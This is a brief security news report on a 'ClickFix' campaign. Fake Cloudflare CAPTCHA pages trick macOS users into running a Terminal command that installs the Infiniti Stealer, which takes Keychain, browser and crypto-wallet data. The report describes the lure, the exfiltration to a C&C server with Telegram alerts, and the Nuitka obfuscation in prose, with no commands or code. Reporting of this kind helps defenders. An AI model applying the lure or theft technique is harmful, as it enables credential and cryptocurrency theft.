Attackers Deploy 'ClickFix' Exploit via Fake Cloudflare Pages
Security researchers at GoPlus Security and Malwarebytes have uncovered a new campaign deploying the 'Infiniti Stealer' malware against macOS users. The attack vector relies on a social engineering method known as 'ClickFix'. Users are presented with a convincing, but fake, Cloudflare CAPTCHA page that instructs them to run a command in their Mac's Terminal to prove they are human.
Executing this command initiates the infection chain. A Bash script is downloaded and run, which in turn fetches the primary malware payload. This technique, previously common in attacks against Windows users, has now been effectively adapted to target the Mac user base, signaling a tactical shift by cybercriminals toward what many perceive as a more secure operating system.
Infiniti Stealer Targets Wallets and Keychain Credentials
Once executed, the 'Infiniti Stealer' payload systematically seeks to exfiltrate valuable data. The malware is specifically coded to locate and steal information from browser credential stores, the central macOS Keychain, and files associated with cryptocurrency wallets. After collecting the data, it is sent to a remote command-and-control (C&C) server through HTTP POST requests, and a notification is sent to the attackers via a Telegram channel.
To complicate detection and analysis, the malware is compiled using Nuitka, a tool that converts Python scripts into native binaries. This makes static analysis by security tools more difficult. The emergence of this sophisticated stealer highlights an escalating risk for cryptocurrency holders on macOS, putting pressure on both users and wallet providers to enhance security measures beyond default operating system protections.
